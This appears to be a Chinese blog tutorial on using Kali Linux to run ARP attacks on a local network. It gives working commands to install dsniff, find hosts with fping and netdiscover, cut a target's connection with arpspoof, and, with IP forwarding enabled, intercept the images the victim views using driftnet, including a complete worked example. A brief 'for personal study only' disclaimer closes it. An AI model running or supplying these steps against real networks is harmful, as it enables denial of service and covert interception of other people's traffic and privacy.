使用kali进行ARP攻击与欺骗

ARP攻击与欺骗

    • ARP攻击
    • ARP欺骗

ARP攻击

一、arpspoof安装
   arpspoof 工具在dsniff中,故kali安装时在root模式下安装dsniff就可。

    apt-get install dsniff

使用kali进行ARP攻击与欺骗_第1张图片
  安装成功后输入arpspoof如果现实版本信息,代表安装成功。
在这里插入图片描述
二、断网攻击
  1、首先检查自己的网卡信息。

        ifconfig -a

使用kali进行ARP攻击与欺骗_第2张图片
 2、确定目标IP

    fping -g 网段/24

使用kali进行ARP攻击与欺骗_第3张图片
  这种方式可以查看活动主机,但无法获取mac地址等信息,建议用netdiscover,命令如下:(如果未扫描到,可以直接用netdiscover命令,或更改24为16或8,具体由自己的子网掩码确定,但个人子网掩码C类,用/24时出结果较慢,/16或不指定范围时较快,不清楚为啥,知道的朋友可以留言告知)

	netdiscover -r 网段/24

使用kali进行ARP攻击与欺骗_第4张图片
 3、进行攻击

	arpspoof -i 自己网卡信息 -t 目标IP -r 网关
	例:arpspoof -i eth0  -t  192.168.1.21 -r 192.168.1.1

使用kali进行ARP攻击与欺骗_第5张图片

ARP欺骗

一、开启IP转发

	echo 1 >/proc/sys/net/ipv4/ip_forward

二、进行arp攻击

	arpspoof -i eth0 -t targetIP -r gateway(具体参考上面)

三、安装driftnet进行查看
  driftnet可用于获取目标IP游览的图片,在root模式下输入如下命令。

	apt-get install driftnet

  安装完成后,运行:

	driftnet -i 你的网卡
例:driftnet -i eth0

四、实例

	echo 1 >/proc/sys/net/ipv4/ip_forward
	arpspoof -i eth0 -t 192.168.1.21 -r 192.168.1.1
	driftnet -i eth0

使用kali进行ARP攻击与欺骗_第6张图片
  如果需要保存某张图片可以更改临时缓存文件,选择想要图片,保存到其他路径下,否则driftnet 关闭,缓存将被清除。

	driftnet -i 网卡 -d 临时缓存路径
例:driftnet -i eth0 -d /home/kali/one

  如果kali在虚拟机里,先把网卡连接到虚拟机里
使用kali进行ARP攻击与欺骗_第7张图片
注:本文仅供个人学习研究

你可能感兴趣的:(#,Kali的基础应用,linux)